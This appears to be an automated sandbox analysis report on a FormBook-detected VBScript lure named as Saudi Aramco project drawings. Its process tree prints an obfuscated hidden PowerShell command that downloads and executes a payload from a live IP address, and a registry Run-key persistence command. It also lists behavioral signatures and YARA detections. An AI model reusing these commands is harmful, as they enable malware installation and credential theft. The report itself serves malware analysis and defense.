Edit tour
Windows
Analysis Report
PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbs
Overview
General Information
| Sample Name: | PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbs |
| Analysis ID: | 1278132 |
| MD5: | 954fb4244b1d939569a961ccd3b1ba26 |
| SHA1: | d8f972cee06b144a6538bb89a2b6d28486ada1f2 |
| SHA256: | cdd6cf1a2efa0b65dc1f2beef48867ab945d99bc0b90443d9947fc8c889d6aba |
| Tags: | vbs |
| Infos: |  |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Powershell download and execute
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Drops PE files with a suspicious file extension
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Drops PE files to the document folder of the user
Injects a PE file into a foreign processes
Powershell drops PE file
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
wscript.exe (PID: 4760 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PROJE CT-_SAUDI_ ARAMCO_DRA WING_AND_S PECS.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) 
cmd.exe (PID: 5464 cmdline: C:\Windows \System32\ cmd.exe" / c "powERsh ELl -WINd hI -ExeCut BypAss wh ile($true) {try{Start -Process ' powershell .exe' -Win dowStyle h idden -Ver b runas -A rgumentLis t '-exec B ypass -c', '$c1=''ie x (New-Obj ect Net.We ''; $c4='' bClient).D ownlo''; $ c3=''adStr ing(''''ht tp://212.1 92.219.52/ Untitled2. bmp'''')'' ;I`E`X ($c 1,$c4,$c3 -Join '''' )' ;exit}c atch{}} MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 5780 cmdline: powERshELl -WINd hI -ExeCut By pAss while ($true){tr y{Start-Pr ocess 'pow ershell.ex e' -Window Style hidd en -Verb r unas -Argu mentList ' -exec Bypa ss -c', '$ c1=''iex ( New-Object Net.We''; $c4=''bCl ient).Down lo''; $c3= ''adString (''''http: //212.192. 219.52/Unt itled2.bmp '''')'';I` E`X ($c1,$ c4,$c3 -Jo in '''')' ;exit}catc h{}} MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 6672 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -exec Bypa ss -c $c1= 'iex (New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //212.192. 219.52/Unt itled2.bmp '')';I`E`X ($c1,$c4, $c3 -Join '') MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
ServiceHub.exe (PID: 7164 cmdline: "C:\Users\ user\AppDa ta\Roaming \ServiceHu b.exe" MD5: 092A9C604129484DE0CE5F2FB3C450D1) - cmd.exe (PID: 5076 cmdline:
C:\Windows \System32\ cmd.exe" / c REG ADD "HKCU\SOFT WARE\Micro soft\Windo ws\Current Version\Ru n" /V "Ser viceHub" / t REG_SZ / F /D "C:\U sers\user\ Documents\ ServiceHub .pif MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 4684 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
reg.exe (PID: 6708 cmdline: REG ADD "H KCU\SOFTWA RE\Microso ft\Windows \CurrentVe rsion\Run" /V "Servi ceHub" /t REG_SZ /F /D "C:\Use rs\user\Do cuments\Se rviceHub.p if" MD5: CEE2A7E57DF2A159A065A34913A055C2) - ServiceHub.exe (PID: 6768 cmdline:
C:\Users\u ser\AppDat a\Roaming\ ServiceHub .exe MD5: 092A9C604129484DE0CE5F2FB3C450D1) - ServiceHub.pif (PID: 3316 cmdline:
"C:\Users\ user\Docum ents\Servi ceHub.pif" MD5: 092A9C604129484DE0CE5F2FB3C450D1) 
msiexec.exe (PID: 7072 cmdline: C:\Windows \SysWOW64\ msiexec.ex e MD5: 12C17B5A5C2A7B97342C362CA467E9A2) - ServiceHub.pif (PID: 6996 cmdline:
"C:\Users\ user\Docum ents\Servi ceHub.pif" MD5: 092A9C604129484DE0CE5F2FB3C450D1) - ServiceHub.pif (PID: 5136 cmdline:
C:\Users\u ser\Docume nts\Servic eHub.pif MD5: 092A9C604129484DE0CE5F2FB3C450D1) 
explorer.exe (PID: 3324 cmdline: C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - ServiceHub.pif (PID: 1792 cmdline:
C:\Users\u ser\Docume nts\Servic eHub.pif MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| Click to see the 12 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| Click to see the 1 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Binary string: | ||
Networking | |
|---|
| Source: | Network Connect: | ||
| Source: | Domain query: | ||
| Source: | Network Connect: | ||
| Source: | Network Connect: | ||
| Source: | Network Connect: | ||
| Source: | Domain query: | ||
| Source: | Domain query: | ||
| Source: | Network Connect: | ||
| Source: | Domain query: | ||
| Source: | Domain query: | ||
| Source: | ASN Name: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||